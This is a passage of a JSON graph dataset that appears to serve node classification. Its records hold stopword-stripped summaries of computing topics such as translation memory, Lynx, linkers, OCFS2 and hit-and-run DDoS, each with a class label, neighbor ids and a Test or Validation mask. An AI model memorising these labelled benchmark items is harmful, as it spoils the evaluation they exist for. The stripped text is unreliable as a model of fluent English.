would completely discontinue bento product line september 30 2013 technical support bento products finally ending july 30 2014",
    "neighbors": [
      10755,
      9732,
      4614,
      1549,
      4111,
      7697,
      11289,
      6186,
      6700,
      1074,
      8754,
      9784,
      8253,
      576,
      5696,
      8783,
      4180,
      10838,
      1623,
      3167,
      3681,
      9826,
      5733,
      8806,
      3691,
      2676,
      6264,
      7292,
      7806,
      2686,
      6783,
      10878,
      8842,
      5784,
      1177,
      4251,
      3228,
      2207,
      10406,
      10919,
      11430,
      171,
      2735,
      3248,
      4283,
      7869,
      713,
      3790,
      7378,
      3286,
      9430,
      3293,
      4318,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      10478,
      7928,
      8441,
      2819,
      1290,
      9999,
      784,
      4888,
      10023,
      4399,
      7983,
      2363,
      2365,
      2366,
      9022,
      1856,
      1346,
      10562,
      838,
      2388,
      2901,
      6495,
      7523,
      9063,
      10602,
      3948,
      11629,
      10608,
      6023,
      6539,
      1428,
      3483,
      2979,
      9123,
      11171,
      11173,
      5546,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      464,
      6608,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      2023,
      8170,
      7154,
      5619,
      11257
    ],
    "mask": "Test"
  },
  {
    "node_id": 6655,
    "label": 0,
    "text": "Translation_memory:translation memory translation memory tm database stores segments sentences paragraphs sentence-like units headings titles elements list previously translated order aid human translators translation memory stores source text corresponding translation language pairs called “ translation units ” individual words handled terminology bases within domain tm software programs use translation memories sometimes known translation memory managers tmm translation memory systems tm systems confused translation management system tms another type software focused managing process translation translation memories typically used conjunction dedicated computer assisted translation cat tool word processing program terminology management systems multilingual dictionary even raw machine translation output research indicates many companies producing multilingual documentation using translation memory systems survey language professionals 2006 82.5 874 replies confirmed use tm usage tm correlated text type characterised technical terms simple sentence structure technical lesser degree marketing financial computing skills repetitiveness content program breaks source text text translated segments looks matches segments source half previously translated source-target pairs stored translation memory presents matching pairs translation candidates translator accept candidate replace fresh translation modify match source last two cases new modified translation goes database translation memory systems search 100 matches say retrieve segments text match entries database exactly others employ fuzzy matching algorithms retrieve similar segments presented translator differences flagged important note typical translation memory systems search text source segment flexibility robustness matching algorithm largely determine performance translation memory although applications recall rate exact matches high enough justify 100 -match approach segments match found translated translator manually newly translated segments stored database used future translations well repetitions segment current text translation memories work best texts highly repetitive technical manuals also helpful translating incremental changes previously translated document corresponding example minor changes new version user manual traditionally translation memories considered appropriate literary creative texts simple reason little repetition language used however others find value even non-repetitive texts database resources created value concordance searches determine appropriate usage terms quality assurance empty segments simplification review process source target segment always displayed together translators work two documents traditional review environment translation memory managers suitable translating technical documentation documents containing specialized vocabularies benefits include main problems hindering wider use translation memory managers include use tm systems might effect quality texts translated main effect clearly related so-called error propagation translation particular segment incorrect fact likely incorrect translation reused next time source text similar source text translated thereby perpetuating error.traditionally two main effects quality translated texts described sentence-salad effect bédard 2000 cited ’ hagan 2009 50 peep-hole effect heyn 1998 first refers lack coherence text level text translated using sentences tm translated different translators different styles according latter translators may adapt style use tm system order contain intratextual references segments better reused future texts thus affecting cohesion readability o'hagan 2009 potential present probably unconscious effect translated text different languages use different sequences logical elements within sentence translator presented multiple clause sentence half translated less likely completely rebuild sentence consistent empirical evidences martín-mor 2011 show translators likely modify structure multiple clause sentence working text processor rather tm system also potential translator deal text mechanically sentence-by-sentence instead focusing sentence relates around text whole researchers dragsted 2004 identified effect relates automatic segmentation feature programs necessarily negative effect quality translations note effects closely related training rather inherent tool according martín-mor 2011 use tm systems effect quality translated texts especially novices experienced translators able avoid pym 2013 reminds translators using tm/mt tend revise segment go along allowing little time final revision whole text end might fact ultimate cause effects described following summary main functions translation memory function used transfer text translation text file tm import done raw format external source text available importing tm along translation sometimes texts reprocessed user another format used import native format format one uses tm save translation memories file process analysis involves following steps export transfers text tm external text file import export inverses translating one main purposes tm retrieve useful matches memory translator choose best one tm must show source target text pointing identities differences several different types matches retrieved tm tm updated new translation accepted translator always updating database question previous contents database tm modified changing deleting entries tm systems allow translators save multiple translations source segment translation memory tools often provide automatic retrieval substitution networking enables group translators translate text together faster working isolation sentences phrases translated one translator available others moreover translation memories shared final translation opportunity mistakes one translator corrected team members text memory basis proposed lisa oscar xml tm standard text memory comprises author memory translation memory unique identifiers remembered translation target language document 'exactly aligned text unit level source document subsequently modified text units changed directly transferred new target version document without need translator interaction concept 'exact 'perfect matching translation memory xml tm also provide mechanisms in-document leveraged fuzzy matching 1970s infancy stage tm systems scholars carried preliminary round exploratory discussions original idea tm systems often attributed martin kay proper place paper details fully given paper shown basic concept storing system translator might start issuing command causing system display anything store might relevant ... going examine past future fragments text contain similar material observation kay actually influenced suggestion peter arthern translators use similar already translated documents online 1978 article gave fully demonstration call tm systems today new text would typed word processing station typed system would check text earlier texts stored memory together translation official languages european community ... one advantage machine translation proper would passages retrieved would grammatically correct effect operating electronic 'cut stick process would according calculations save least 15 per cent time translators employ effectively producing translations idea incorporated alps automated language processing systems tools first developed researcher brigham young university time idea tm systems mixed tool call repetitions processing aimed find matched strings long time concept so-called translation memory come real exploratory stage tm systems would 1980s one first implementation tm system appeared sadler vendelmans bilingual knowledge bank bilingual knowledge bank syntactically referentially structured pair corpora one translation translation units cross-coded corpora aim bilingual knowledge bank develop corpus-based general-purpose knowledge source applications machine translation computer-aided translation sadler vendelman 1987 another important step made brian harris bi-text defined bi-text single text two dimensions 1988 source target texts related activity translator translation units made similar echoes sadler bilingual knowledge bank harris work proposed something like tm system without using name database paired translations searchable either individual word whole translation unit latter case search allowed retrieve similar rather identical units tm technology became commercially available wide scale late 1990s efforts made several engineers translators note first tm tool called trados sdl trados nowadays tool opening source file applying translation memory 100 matches identical matches fuzzy matches similar identical matches within text instantly extracted placed within target file matches suggested translation memory either accepted overridden new alternatives translation unit manually updated stored within translation memory future use well repetition current text similar way segments target file without match would translated manually automatically added translation memory 2000s online translation services began incorporating tm machine translation services like google translate well professional hybrid translation services provided sites like gengo ackuna incorporate databases tm data supplied translators volunteers make efficient connections languages provide faster translation services end-users one recent development concept 'text memory contrast translation memory also basis proposed lisa oscar standard text memory within xml tm comprises 'author memory 'translation memory author memory used keep track changes authoring cycle translation memory uses information author memory implement translation memory matching although primarily targeted xml documents xml tm used document converted xliff format much powerful first-generation tm systems include linguistic analysis engine use chunk technology break segments intelligent terminological groups automatically generate specific glossaries translation memory exchange tmx standard enables interchange translation memories translation suppliers tmx adopted translation community best way importing exporting translation memories current version 1.4b allows recreation original source target documents tmx data termbase exchange lisa standard revised republished iso 30042 allows interchange terminology data including detailed lexical information framework tbx provided three iso standards iso 12620 iso 12200 iso 16642 iso 12620 provides inventory well-defined “ data categories ” standardized names function data element types predefined values iso 12200 also known martif provides basis core structure tbx iso 16642 also known terminological markup framework includes structural meta-model terminology markup languages general universal terminology exchange utx format standard specifically designed used user dictionaries machine translation used general human-readable glossaries purpose utx accelerate dictionary sharing reuse extremely simple practical specification segmentation rules exchange srx intended enhance tmx standard translation memory data exchanged applications used effectively ability specify segmentation rules used previous translation may increase leveraging achieved gilt metrics gilt stands globalization internationalization localization translation gilt metrics standard comprises three parts gmx-v volume metrics gmx-c complexity metrics gmx-q quality metrics proposed gilt metrics standard tasked quantifying workload quality requirements given gilt task open lexicon interchange format olif open xml-compliant standard exchange terminological lexical data although originally intended means exchange lexical data proprietary machine translation lexicons evolved general standard terminology exchange xml localisation interchange file format xliff intended provide single interchange file format understood localization provider xliff preferred way exchanging data xml format translation industry translation web services transws specifies calls needed use web services submission retrieval files messages relating localization projects intended detailed framework automation much current localization process use web services xml tm xml-based text memory approach translation memory based concept text memory comprises author translation memory xml tm donated lisa oscar xml-intl gettext portable object format though often regarded translation memory format gettext po files bilingual files also used translation memory processes way translation memories used typically po translation memory system consist various separate files directory tree structure common tools work po files include gnu gettext tools translate toolkit several tools programs also exist edit po files mere source text files",
    "neighbors": [
      1890,
      10724,
      717,
      9645,
      7599,
      8688,
      9552,
      567,
      7164
    ],
    "mask": "None"
  },
  {
    "node_id": 6656,
    "label": 3,
    "text": "Grosch's_law:grosch law grosch law following observation computer performance made herb grosch 1953 believe fundamental rule modestly call grosch law giving added economy square root increase speed — calculation ten times cheaply must hundred times fast adage commonly stated computer performance increases square cost computer costs twice much computer b expect computer four times fast computer b two years grosch statement seymour cray quoted business week august 1963 expressing thought computers obey square law — price doubles get least four times much speed law also interpreted meaning computers present economies scale costly computer price–performance ratio linearly becomes better implies low-cost computers compete market analysis rental cost/performance data computers 1951 1963 knight found grosch law held commercial scientific operations modern analysis data found grosch law applied commercial operations separate study knight found grosch law apply computers 1963-1967 also confirmed modern analysis paul strassmann asserted 1997 never clear whether grosch law reflection ibm priced computers whether related actual costs provided rationale bigger computer always better ibm sales force used grosch rationale persuade organizations acquire computing capacity needed grosch law also became justification offering time-sharing services big data centers substitute distributed computing grosch stated law useful 1960s 1970s today originally intended law means pricing computing services",
    "neighbors": [
      1376,
      2273,
      5798,
      5802,
      78,
      8367,
      785,
      1778,
      6801,
      153,
      7006
    ],
    "mask": "Test"
  },
  {
    "node_id": 6657,
    "label": 5,
    "text": "Lynx_(web_browser):lynx web browser lynx customizable text-based web browser use cursor-addressable character cell terminals oldest web browser still general use active development started 1992 lynx product distributed computing group within academic computing services university kansas initially developed 1992 team students staff university lou montulli michael grobe charles rezac hypertext browser used solely distribute campus information part campus-wide information server browsing gopher space beta availability announced usenet 22 july 1992 1993 montulli added internet interface released new version 2.0 browser garrett blythe created doslynx april 1994 later joined lynx effort well foteos macrides ported much lynx vms maintained time 1995 lynx released gnu general public license maintained group volunteers led browsing lynx consists highlighting chosen link using cursor keys links page numbered entering chosen link number current versions support ssl many html features tables formatted using spaces frames identified name explored separate pages lynx inherently display various types non-text content web images video launch external programs handle image viewer video player unlike web browsers lynx support javascript adobe flash websites require work correctly speed benefits text-only browsing apparent using low bandwidth internet connections older computer hardware may slow render image-heavy content lynx support graphics web bugs track user information fetched therefore web pages read without privacy concerns graphic web browsers however lynx support http cookies also used track user information lynx therefore supports cookie whitelisting blacklisting alternatively cookie support disabled permanently conventional browsers lynx also supports browsing histories page caching raise privacy concerns lynx accepts configuration options either command-line options configuration files 142 command line options according help message template configuration file codice_1 lists 233 configurable features overlap two although command-line options codice_2 matched codice_1 addition pre-set options command-line configuration file lynx behavior adjusted runtime using options menu overlap settings lynx implements many runtime optional features optionally controlled setting configuration file allowing choices saved separate writable configuration file reason restricting options saved originated usage lynx common mid-1990s i.e. using lynx front-end application internet accessed dial-in connections refreshable braille display text-to-speech–friendly interface lynx used internet access visually impaired users lynx substitutes images frames non-textual content text codice_4 codice_5 codice_6 html attributes allows hiding user interface elements browser becomes specifically suitable use cost-effective general purpose screen reading software version lynx specifically enhanced use screen readers windows developed indian institute technology madras lynx also useful accessing websites remotely connected system graphical display available despite text-only nature age still used effectively browse much modern web including performing interactive tasks editing wikipedia since lynx take keystrokes text file still useful automated data entry web page navigation web scraping consequently lynx used web crawlers web designers may use lynx determine way search engines web crawlers see sites develop online services provide lynx view given web page available lynx also used test websites performance one run browser different locations remote access technologies like telnet ssh one use lynx test web site connection performance different geographical locations simultaneously another possible web design application browser quick checking site links lynx originally designed unix-like operating systems though ported vms soon public release systems including dos microsoft windows classic mac os os/2 included default openbsd installation openbsd 2.3 may 1998 5.5 may 2014 main tree prior july 2014 subsequently made available ports tree also found repositories linux distributions well homebrew fink repositories macos ports beos minix qnx amigaos os/2 also available sources built many platforms e.g. mention made google android operating system",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      7188,
      7702,
      6171,
      9757,
      7713,
      3110,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      576,
      5707,
      10834,
      6231,
      8281,
      6747,
      10341,
      1642,
      9834,
      9841,
      115,
      9843,
      3191,
      119,
      4728,
      124,
      637,
      1664,
      2182,
      6797,
      3218,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      741,
      4326,
      4331,
      4844,
      8443,
      9987,
      7943,
      1807,
      8467,
      788,
      5397,
      278,
      3350,
      7965,
      1834,
      7983,
      823,
      10057,
      11082,
      10060,
      2893,
      1379,
      11112,
      8557,
      3961,
      7547,
      6528,
      3971,
      3462,
      8584,
      6028,
      7572,
      5026,
      944,
      5054,
      10174,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6658,
    "label": 4,
    "text": "Digger_gold:digger gold digger gold common slang term gold recovered electronics components board fingers cpus connector pins gold fingers boards circuits often stripping solution used remove gold board material nitric acid also works well regard many gold components soldered boards silver-based solders soluble nitric acid gold dissolving metals solution digger gold recovered dissolution gold aqua regia subsequent selective precipitation gold using ferrous sulfate another selective reducing agent hydrazine",
    "neighbors": [
      1477,
      11534,
      9499,
      3666,
      2867,
      403,
      7579
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6659,
    "label": 3,
    "text": "ELVEES_Multicore:elvees multicore multicore series 32-bit microprocessors embedded dsp cores developed elvees russia microprocessor mips32 core called riscore32 elvees optionally fpu arm cortex-a9 core processors series radiation hardened rad-hard space applications",
    "neighbors": [
      9861,
      7687,
      1425,
      6033,
      2838,
      4386,
      426,
      6957,
      8625,
      1461,
      2490,
      11580,
      5825,
      7234,
      7745,
      2503,
      2523,
      9309,
      5358,
      1776,
      499,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 6660,
    "label": 3,
    "text": "Commodore_PC_compatible_systems:commodore pc compatible systems commodore pc compatible systems range ibm pc compatible personal computers introduced 1984 home computer manufacturer commodore business machines incompatible commodore prior commodore 64 amiga architectures generally regarded good serviceable workhorse pcs nothing spectacular well-established commodore name seen competitive asset 1984 commodore signed deal intel second source manufacture intel 8088 cpu used ibm pc along license manufacture computer based dynalogic hyperion unknown whether systems produced sold 1987 first model released pc-10 sold 559 without monitor sold alongside commodore amiga commodore 64c/128 lines home graphics computers pc10 comparable market blue chip pc leading edge model tandy 1000 line pc compatibles line consists following models",
    "neighbors": [
      6129,
      4642,
      1461,
      2159
    ],
    "mask": "Test"
  },
  {
    "node_id": 6661,
    "label": 2,
    "text": "Stormy_Peters:stormy peters stormy peters information technology industry analyst prominent free open source software foss advocate promoting business use foss advocates consultant conference speaker co-founded later appointed executive director gnome foundation previously worked mozilla cloud foundry works red hat peters birth name robyn however gone name since childhood peters completed bachelor arts major computer science rice university initially worked software engineer hewlett-packard unix development team approximately 1999 peters managing hp-ux desktop development became aware gnome project team decided provide gnome hpux peters role explaining open source business intellectual property models hewlett-packard management later founded hewlett-packard open source program office 2000 became one founding members gnome foundation advisory board december 2005 peters became director product management openlogic open source services company july 2008 peters left openlogic became executive director gnome foundation role coordinating sponsors business development marketing november 2010 left mozilla since august 2011 member gnome board directors peters given keynote talks many open source conferences including open source business conference linux.conf.au 2008 2009 gnome.asia summit beijing ho chi minh city respectively ohio linuxfest 2010",
    "neighbors": [
      1304,
      5384,
      5492,
      9455
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6662,
    "label": 0,
    "text": "Mark_Steedman:mark steedman mark jerome steedman fba frse born 18 september 1946 computational linguist cognitive scientist steedman graduated university sussex 1968 b.sc experimental psychology university edinburgh 1973 ph.d. artificial intelligence dissertation formal description musical perception gained 1972 advisor prof. h.c. longuet-higgins frs held posts lecturer psychology university warwick 1977–83 lecturer reader computational linguistics university edinburgh 1983-8 associate full professor computer information sciences university pennsylvania 1988–98 held visiting positions university texas austin max planck institute psycholinguistics nijmegen university pennsylvania philadelphia steedman currently holds chair cognitive science school informatics university edinburgh 1998- works computational linguistics artificial intelligence cognitive science generation meaningful intonation speech artificial agents animated conversation communicative use gesture tense aspect combinatory categorial grammar ccg also interested computational musical analysis combinatory logic",
    "neighbors": [
      1890,
      10890,
      7724,
      4916,
      10102,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 6663,
    "label": 3,
    "text": "IBM_Rivina:ibm rivina rivina experimental 64-bit powerpc microprocessor built ibm 2000 successor guts gigahertz unit test site purpose build processor able reach high frequencies first microprocessors reach surpass 1 ghz mark project work conducted fewer twenty engineers course two years idea use aggressive circuit design techniques carefully crafted floorplan microarchitecture keeping short six stage pipeline guts supported subset 100 mainly integer instructions powerpc instruction set rivina used complete 64-bit powerpc specification including dual precision floating point address translation guts small single cycle 4 kb l1 cache rivina used two-cycle two set associative 64 kb cache instead processor comprised 19 million transistors manufactured using ibm cmos 7s 0.22 μm copper fabrication process able reach 1.15 ghz dissipating 112 watts 101 °c",
    "neighbors": [
      6914,
      4868,
      10501,
      3846,
      4743,
      5642,
      1548,
      1933,
      398,
      3472,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      5297,
      8120,
      9020,
      1725,
      1983,
      10180,
      8523,
      8530,
      3540,
      342,
      9302,
      11613,
      6878,
      1635,
      10214,
      10985,
      10734,
      3185,
      4211,
      5235,
      8058,
      3323,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6664,
    "label": 9,
    "text": "Linker_(computing):linker computing computing linker link editor computer utility program takes one object files generated compiler assembler combines single executable file library file another 'object file simpler version writes output directly memory called loader though loading typically considered separate process computer programs typically composed several parts modules parts/modules need contained within single object file cases refer means symbols addresses modules mapped memory addresses linked execution typically object file contain three kinds symbols compilers object file result compiling one input source code file program comprises multiple object files linker combines files unified executable program resolving symbols goes along linkers take objects collection called library runtime library linkers include whole library output include files referenced object files libraries library linking may thus iterative process modules included requiring additional modules linked libraries exist diverse purposes one system libraries usually linked default linker also takes care arranging objects program address space may involve relocating code assumes specific base address another base since compiler seldom knows object reside often assumes fixed base location example zero relocating machine code may involve re-targeting absolute jumps loads stores executable output linker may need another relocation pass finally loaded memory execution pass usually omitted hardware offering virtual memory every program put address space conflict even programs load base address pass may also omitted executable position independent executable unix variants sintran iii process performed linker assembling object files program called loading loading executable code onto file additionally operating systems program handles jobs linking loading program dynamic linking many operating system environments allow dynamic linking deferring resolution undefined symbols program run means executable code still contains undefined symbols plus list objects libraries provide definitions loading program load objects/libraries well perform final linking approach offers two advantages also disadvantages static linking result linker copying library routines used program executable image may require disk space memory dynamic linking portable since require presence library system runs static linking also prevents dll hell since program includes exactly versions library routines requires conflict programs program using routines library require entire library installed compiler information layout objects final output take advantage shorter efficient instructions place requirement address another object example jump instruction reference absolute address offset current location offset could expressed different lengths depending distance target generating conservative instruction usually largest relative absolute variant depending platform adding relaxation hints possible substitute shorter efficient instructions final link step performed input objects read assigned temporary addresses linker relaxation pass subsequently reassigns addresses may turn allow relaxations occur general substituted sequences shorter allows process always converge best solution given fixed order objects case relaxations conflict linker needs weigh advantages either option instruction relaxation typically occurs link-time inner-module relaxation already take place part optimising process compile-time cases relaxation also occur load-time part relocation process combined dynamic dead-code elimination techniques ibm system/360 mainframe environments os/360 including z/os z/architecture mainframes type program known linkage editor name implies linkage editor additional capability allowing addition replacement and/or deletion individual program sections operating systems os/360 format executable load-modules containing supplementary data component sections program individual program section replaced parts program updated relocatable addresses references corrected linkage editor part process one advantage allows program maintained without keep intermediate object files without re-compile program sections n't changed also permits program updates distributed form small files originally card decks containing object module replaced systems object code form format 80-byte punched-card images updates introduced system using medium later releases os/360 subsequent systems load-modules contain additional data versions components modules create traceable record updates term linkage editor construed implying program operates user-interactive mode like text editor intended batch-mode execution editing commands supplied user sequentially organized files punched cards dasd magnetic tape tapes often used initial installation os",
    "neighbors": [
      515,
      9733,
      9735,
      2573,
      11279,
      3603,
      5154,
      4645,
      4151,
      2620,
      2627,
      3659,
      1100,
      4173,
      9291,
      1106,
      2138,
      4712,
      7273,
      8301,
      2672,
      3186,
      9331,
      2168,
      5759,
      10883,
      4750,
      2198,
      6812,
      3744,
      7847,
      8874,
      1724,
      7356,
      9921,
      1730,
      1219,
      5833,
      7881,
      9946,
      10971,
      10475,
      1775,
      4850,
      2804,
      3323,
      7421,
      4349,
      8959,
      8966,
      6921,
      9996,
      10510,
      8976,
      1299,
      11539,
      10520,
      1820,
      5921,
      6950,
      10537,
      4398,
      7983,
      1328,
      1336,
      5432,
      3386,
      10040,
      4424,
      8522,
      3410,
      3413,
      8037,
      11625,
      5492,
      7032,
      2942,
      9599,
      1922,
      4483,
      3976,
      11160,
      7071,
      1952,
      5546,
      5040,
      946,
      5557,
      7607,
      10176,
      965,
      5065,
      477,
      5598,
      2015,
      4071,
      6120,
      10732,
      9714,
      9204,
      6138,
      2045,
      5630
    ],
    "mask": "Test"
  },
  {
    "node_id": 6665,
    "label": 4,
    "text": "Veracode:veracode veracode application security company based burlington massachusetts founded 2006 company provides automated cloud-based service securing web mobile third-party enterprise applications veracode provides multiple security analysis technologies single platform including static analysis dynamic analysis mobile application behavioral analysis software composition analysis march 9 2017 ca technologies announced acquiring veracode approximately 614 million cash april 3 2017 ca technologies announced completed acquisition veracode july 11 2018 broadcom announced acquiring veracode parent ca technologies 18.9 billion cash november 5 2018 broadcom announced completed acquisition ca technologies thus officially became new owner veracode business day thoma bravo private equity firm headquartered san francisco california announced agreed acquire veracode broadcom 950 million cash veracode founded chris wysopal christien rioux former engineers stake cambridge massachusetts-based security consulting firm known employing former “ white hat ” hackers l0pht heavy industries much veracode software written rioux 2007 company launched securityreview service used test code order find vulnerabilities could lead cybersecurity breaches hacking service intended used alternative penetration testing involves hiring security consultant hack system november 29 2011 company announced appointed robert t. brennan former ceo iron mountain incorporated new chief executive officer company issued report cybersecurity june 2015 report found sectors failed industry-standard security tests web mobile applications government worst performing sector regards fixing security vulnerabilities report issued company december 2015 found four five applications written popular web scripting languages contain least one critical risks industry-standard security benchmark 2014 veracode customers included three top four banks fortune 100 fortune reported march 2015 veracode planned file initial public offering ipo later year order go public major investors company include .406 ventures accomplice starvest partners meritech capital partners funding round announced september 2014 firm raised late-stage investment led wellington management company participation existing investors 2013 veracode ranked 20th forbes list top 100 promising companies america veracode named one 20 coolest cloud security vendors 2014 cloud 100 crn magazine gartner named veracode leader four consecutive years 2013 2014 2015 2016 gartner magic quadrant application security testing",
    "neighbors": [
      9217,
      4194,
      4549,
      584,
      5512,
      10412,
      7228,
      5111,
      5404
    ],
    "mask": "Test"
  },
  {
    "node_id": 6666,
    "label": 9,
    "text": "Karl_Lieberherr:karl lieberherr karl j. lieberherr professor computer science northeastern university boston studies eth zurich obtaining m.s 1973 ph.d. 1977 wrote first book adaptive programming work theme one several secondary influences development aspect-oriented programming adaptive programming tries create applications easy maintain evolve creating new abstraction layer design implementation object-oriented applications concept takes encapsulation new level allowing changes way object works without changing interface objects technique solves situations object takes assumptions objects work change object takes assumption creating chain effect rest system aspect oriented programming affects way application created following directives concept one could create separate objects treat data process separated way allows flexible application change evolve easily",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 6667,
    "label": 4,
    "text": "Hit-and-run_DDoS:hit-and-run ddos hit-and-run ddos type denial-of-service ddos attack uses short bursts high volume attacks random intervals spanning time frame days weeks purpose hit-and-run ddos prevent user service using service bringing host server type attack distinguished persistent ddos attack continues attacker stops attack host server able defend ddos attack characterized explicit attempt attackers prevent legitimate users service using service hit-and-run ddos accomplished using high volume network application attacks short bursts attacks last long enough bring server hosting service normally 20 60 minutes attack repeated every 12 24 hours period days weeks causing issues company hosting service hit-and-run ddos sometimes used test ddos attack attacker inject bad packets network test online functioning network verified functioning attacker use persistent ddos attack hit-and-run ddos exploits anti-ddos software services used defend prolonged ddos attacks activating software take longer actual attack allowing denial service ddos protection start defend attack",
    "neighbors": [
      2409,
      8930,
      6347,
      4495
    ],
    "mask": "Test"
  },
  {
    "node_id": 6668,
    "label": 4,
    "text": "Deputy_Director_of_the_National_Security_Agency:deputy director national security agency deputy director national security agency highest-ranking civilian within national security agency senior civilian nsa deputy director acts agency chief operating officer guiding directing strategies policy serves principal advisor director nsa deputy director reports nsa director required technically experienced civilian current deputy director george c. barnes armed forces security agency afsa predecessor nsa nowiki /nowiki november 1950 april 1951 deputy director service",
    "neighbors": [
      289,
      4898,
      7137,
      10305,
      11302,
      327,
      266,
      365,
      1838,
      4719,
      7887,
      2897,
      1714,
      9357,
      10832,
      4566,
      2712,
      6749
    ],
    "mask": "Test"
  },
  {
    "node_id": 6669,
    "label": 6,
    "text": "OCFS2:ocfs2 oracle cluster file system ocfs second version ocfs2 shared disk file system developed oracle corporation released gnu general public license first version ocfs developed main focus accommodate oracle database management system used cluster computing posix-compliant file system version 2 posix features included ocfs2 version 2 integrated version 2.6.16 linux kernel initially marked experimental alpha-test code restriction removed linux version 2.6.19 kernel version 2.6.29 late 2008 features included ocfs2 access control lists quotas ocfs2 used distributed lock manager resembles openvms dlm much simpler oracle announced version 1.6 november 2010 included copy write feature called reflink",
    "neighbors": [
      5120,
      2051,
      2564,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      3708,
      9343,
      5256,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      4841,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3326,
      3328,
      11012,
      2314,
      1291,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 6670,
    "label": 5,
    "text": "PHY_(chip):phy chip phy abbreviation physical layer electronic circuit usually implemented chip required implement physical layer functions osi model phy connects link layer device often called mac acronym medium access control physical medium optical fiber copper cable phy device typically includes physical coding sublayer pcs physical medium dependent pmd layer functionality ethernet phy component operates physical layer osi network model implements ethernet physical layer portion 1000base-t 100base-tx 10base-t standards specifically ethernet phy chip implements hardware send receive function ethernet frames interfaces analog domain ethernet line modulation digital domain link-layer packet signaling phy usually handle mac addressing link layer job similarly wake-on-lan boot rom functionality implemented network interface card nic may phy mac functionality integrated one chip separate chips examples include microsemi simpliphy synchrophy vsc82xx/84xx/85xx/86xx family marvell alaska 88e1310/88e1310s/88e1318/88e1318s gigabit ethernet transceivers offerings intel ics",
    "neighbors": [
      38,
      3847,
      9767,
      4202,
      3883,
      8909,
      6670,
      7698,
      4691,
      10005,
      2998,
      7865,
      11321
    ],
    "mask": "Test"
  },
  {
    "node_id": 6671,
    "label": 2,
    "text": "Drakconf:drakconf drakconf mandriva control center computer program written perl configuration mandriva linux linux distribution tool allows easy configuration mandriva licensed open-source gnu general public license also used mageia fork mandriva called mageia control center part so-called drakxtools specifically designed linux distribution running command-line x window system environment however source code available could ported distributions tool key feature mandriva linux puts many configuration tools together one place easier user new linux configuring system instead changing configuration files using text editor",
    "neighbors": [
      8582,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 6672,
    "label": 8,
    "text": "Contextual_deep_linking:contextual deep linking contextual deep linking form deep linking mobile apps links specific content within app rather generic welcome screen app basic mobile deep linking typically allows deep link content apps ’ already downloaded contextual deep linking allows pass information app store referring information passed app store ios google play bringing user content links within app whether app previously installed",
    "neighbors": [
      1944,
      8413,
      6469,
      9063
    ],
    "mask": "Test"
  },
  {
    "node_id": 6673,
    "label": 9,
    "text": "George_Springer_(mathematician):george springer mathematician george springer september 3 1924 – february 18 2019 american mathematician computer scientist professor emeritus computer science indiana university bloomington springer perhaps best known coauthor daniel p. friedman widely used textbook scheme art computer programming scheme one two main dialects lisp three pioneering books scheme scheme programming language 1982 r. kent dybvig structure interpretation computer programs 1985 harold abelson gerald jay sussman julie sussman scheme art computer programming 1989 springer friedman springer earned bachelor degree 1945 case western reserve university named case institute technology master degree 1946 brown university earned phd 1949 harvard university thesis coefficient problem univalent mappings exterior unit circle lars ahlfors 1949 1951 springer c.l.e moore instructor massachusetts institute technology 1951 1954 assistant professor northwestern university academic year 1954/1955 fulbright lecturer visiting professor university münster worked heinrich behnke autumn 1955 springer became associate professor subsequently professor university kansas academic year 1961/1962 fulbright lecturer visiting professor university würzburg 1964 professor mathematics 1987 also professor computer science indiana university bloomington academic year 1971/1972 visiting professor imperial college london springer began career working function theory one several complex variables wrote textbook riemann surfaces 1980s turned toward computer science working programming languages springer born cleveland ohio 1924 family jewish immigrants poland met wife annemarie née keiner harvard university married 1950 death 2011 three children springer died february 18 2019 aged 94",
    "neighbors": [
      10083,
      6502,
      6767,
      9749,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 6674,
    "label": 2,
